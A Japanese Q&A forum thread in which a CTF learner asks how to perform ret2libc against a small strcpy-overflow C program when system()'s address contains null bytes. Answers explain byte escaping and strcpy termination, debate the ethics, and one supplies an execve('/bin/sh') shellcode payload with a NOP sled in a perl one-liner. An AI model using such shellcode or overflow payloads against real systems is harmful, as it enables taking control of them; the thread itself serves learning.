質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

ただいまの
回答率

89.63%

アドレスに0x00を含む時にret2libcできない

解決済

回答 4

投稿 編集

  • 評価
  • クリップ 2
  • VIEW 1,529

somu

score 30

ret2libc 攻撃を実験してみようと思い、SSPとASLRを無効にして、バッファオーバーフローによりリターンアドレスをsystem()へのアドレスに書き換え、引数を/bin/shにしようとしました。
しかし、system()アドレスが0x0000......だったため引数を指定できませんでした。
実行環境のメモリアドレスは8バイトあるため、全てが0x0000......で表されています。このような場合に、上手くsystem(/bin/sh)を実行する方法を教えて下さい。

補足
このプログラムを、gdbにおいて、
perl -e 'print "A"x128,"B"x8,"(system関数のアドレス)","(exit関数のアドレス)", "(環境変数を用いた 文字列/bin/sh へのアドレス)"'
で実行した所、system関数のアドレスが \x--\x.......\x00\x00となってしまうため、strcpyが文字列として認識するのが入力値のsystem関数のアドレスの6バイト目までとなってしまい、system関数の引数部分を書き換えられない、という意味です。うまく伝わればいいのですが・・・
また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。

この実験で使用したコードは以下の通りです。

#include <stdio.h>
#include <string.h>

void bug(char *arg1){
    char name[128];
    strcpy(name,arg1);
    printf("Hello %s\n", name);
}

int main(int argc, char **argv){
    if(argc < 2){
        printf("Usage: %s <your name>\n", argv[0]);
        return 0;
    }
    bug(argv[1]);
    return 0;
}


ubuntu14.04 64bitで実行しました。

  • 気になる質問をクリップする

    クリップした質問は、後からいつでもマイページで確認できます。

    またクリップした質問に回答があった際、通知やメールを受け取ることができます。

    クリップを取り消します

  • 良い質問の評価を上げる

    以下のような質問は評価を上げましょう

    • 質問内容が明確
    • 自分も答えを知りたい
    • 質問者以外のユーザにも役立つ

    評価が高い質問は、TOPページの「注目」タブのフィードに表示されやすくなります。

    質問の評価を上げたことを取り消します

  • 評価を下げられる数の上限に達しました

    評価を下げることができません

    • 1日5回まで評価を下げられます
    • 1日に1ユーザに対して2回まで評価を下げられます

    質問の評価を下げる

    teratailでは下記のような質問を「具体的に困っていることがない質問」、「サイトポリシーに違反する質問」と定義し、推奨していません。

    • プログラミングに関係のない質問
    • やってほしいことだけを記載した丸投げの質問
    • 問題・課題が含まれていない質問
    • 意図的に内容が抹消された質問
    • 過去に投稿した質問と同じ内容の質問
    • 広告と受け取られるような投稿

    評価が下がると、TOPページの「アクティブ」「注目」タブのフィードに表示されにくくなります。

    質問の評価を下げたことを取り消します

    この機能は開放されていません

    評価を下げる条件を満たしてません

    評価を下げる理由を選択してください

    詳細な説明はこちら

    上記に当てはまらず、質問内容が明確になっていない質問には「情報の追加・修正依頼」機能からコメントをしてください。

    質問の評価を下げる機能の利用条件

    この機能を利用するためには、以下の事項を行う必要があります。

回答 4

checkベストアンサー

+4

しかし、system()アドレスが0x0000......だったため引数を指定できませんでした。

ちょっと意味を掴みかねていますが、先のご質問 #170151 - gdbのSIGSEGVについて の延長でしょうか?
もし、先の質問内容中のコードperl -e 'print "A"x144' に関連して、戻り先アドレスとして値に0を埋めたいと言うことであれば、perlの文字列でC言語のように16進数指定や\0指定もできるので、それを利用すれば所望の結果を得られると思います。

# 'A'を2文字 + '\0'(0x00) + '0'を3文字
$ perl -e 'print "A"x2 . "\0" . "\x30"x3'  | od -t xC
0000000 41 41 00 30 30 30
0000006

# 'A'を2文字 + 0x00, 0x01, 0x02 + '0'を3文字
$ perl -e 'print "A"x2 . "\x00\x01\x02" . "\x30"x3' | od -t xC
0000000 41 41 00 01 02 30 30 30
0000010

純粋に技術的な興味からくる実験だとは思いますが、最終的には攻撃手法の解説やヘルプになってしまう恐れはありますので、回答としてはこの辺にしておきます。そもそも回答として外していたらごめんなさい。


質問者さんの補足を受けて追記しました:2019-01-23 09:55

strcpyが文字列として認識するのが入力値のsystem関数のアドレスの6バイト目までとなってしまい

つまりはperl -e ...での実行結果をコマンドライン文字列としてmainで受け取っていて、その生成されたコマンドラインオプションの文字列が途中で'\0'を含んでしまっているので、strcpyで途中までしか取り込めない、と言うことでしたか。理解しました。

実験の主旨からするとコマンドラインから指定するのが必須要件ではないはずです。perlのスクリプトを使っているのは「便利だから」程度の理由だと思いますが、プログラム中で定数で指定してしまっても実験はできるはずですし、あくまで「外部から入力したい」と言うことであればパラメータを渡す方法はいくらでも考えられます。※どのような方法があるかは課題としてご自分で考えてみてください。

また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。

個人的には低レイヤーでかつ、セキュリティ系に興味を覚える方は少なく、(良い意味での)貴重な将来の人材と成り得るとは思っているので、若干の警戒はあるものの全面的に疑っている訳ではありません。ただ、別回答にもありましたが、どんな内容が悪用されるか分かりません。初心者レベルの攻撃でも、例えば子供でも刃物を持ってうろついていたら保護されるように、初心者レベルのプログラムでも意図した攻撃や誤用で罪になることも考えられます。

ご存知だとは思いますが:
警視庁 - 不正指令電磁的記録に関する罪

今に始まったことではありませんが、teratailをはじめ、公共の目にとまりやすいWEBサイトでそのような情報を共有すること自体がリスクになっているので、慎重にならざるを得ません。

投稿

編集

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

+4

NXも無効であれば、ret2libcではなくargv[1]に入っているshellcodeの移動した方が簡単気がします。例えば、execve(/bin/sh)のshellcodeを書き込んで、RETをそのアドレスに書き換えてみればいかがでしょうか?

こういう感じで、nop-sledのサイズとoffsetを自分で調整してみてください。

$ perl -e 'print "\x90"x53,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","<little-endianでargv[1]のおよそのアドレス>"x15'

DEPとASLRがある場合、ROP shellcodeを書くしかないです。

※ CTF頑張ってください!

投稿

編集

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2019/01/25 20:45

    回答ありがとうございます!
    とても参考になります。

    キャンセル

  • 2019/01/25 22:05

    英語なんですが、この攻撃を最初に解説した記事を読むのがお勧めです。

    http://phrack.org/issues/49/14.html

    キャンセル

  • 2019/02/22 21:28

    ありがとうございます。読ませてもらいます。

    キャンセル

+2

C言語 (やその仲間) では、文字列は配列の一種です。配列というのは、メモリ上の連続した範囲に同じ型のデータがならんでいるもののことです。

ただし、配列を文字列として扱う際には特別な約束ごとがあります。「\0があったらそこで終了とみなす」というものです。strcpyなどのstr...系のC標準ライブラリ関数は、配列をそのようなものとして扱います。

今回の場合、メモリ上の特定の範囲を配列として扱いたいだけで、文字列を扱いたいわけではないですから、str...系の関数は使えません。似た関数で (文字列とは限らない) 配列として扱うmem...系の関数があります。 たとえばmemcpyなどですね。調べてみてください。


なお、システムに設計時の意図と異なる動作をさせる手法について調査や実験をすることは問題ありません。
それを応用して他人の権利を侵害したり財物を窃取したりすれば犯罪ですが、そうでなければ学習・研究の一環です。またそうした調査・実験をすることで、意図しない動作をさせないシステムのつくりかたを学ぶこともできます (もちろん、他人が現に運用しているシステムで実験してはいけません)。

「攻撃」といった言葉に過剰反応して本来できたはずの回答を控えたり、質問したこと自体を非難するのはやめたほうがいいです。(たとえですが) アルコール発酵の仕組みについてどこかの質問サイトで質問した人に「酒税法にひっかかるぞ」と言っているようなもので、的外れです。

投稿

編集

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

+1

また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。 

全く意味がないですね
あなたが嘘を言ってないという証明はできるでしょうか

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2019/01/23 07:34 編集

    1人目の回答者さんに答えたつもりだったんですが...
    しかし1人目の方も気にされているので、そう捉える人がいるのを考えると確かにここでするべき質問ではなかったですね。失礼しました。自分で解決してみます。

    キャンセル

  • 2019/01/25 20:01

    somuさん、ご遠慮なく聞いていてください。日本のセキュリティ人材の不足が世界に比べるともっとも激しくて、あなたのような好奇心を持った研究者が減るとサイバーセキュリティ大臣みたいなパソコンすら利用していないお爺ちゃんしか残らないのですから。

    キャンセル

  • 2019/01/27 18:04

    somuさん、私も遠慮無く聞いていいと思います。
    「ASLRさえない環境でのとても単純な攻撃を犯罪に使えるかもしれないと捉え」て言いがかりをつけてくるようなような判断力の低い人の話を真に受ける必要はありません。
    CTF頑張ってください。

    キャンセル

15分調べてもわからないことは、teratailで質問しよう!

  • ただいまの回答率 89.63%
  • 質問をまとめることで、思考を整理して素早く解決
  • テンプレート機能で、簡単に質問をまとめられる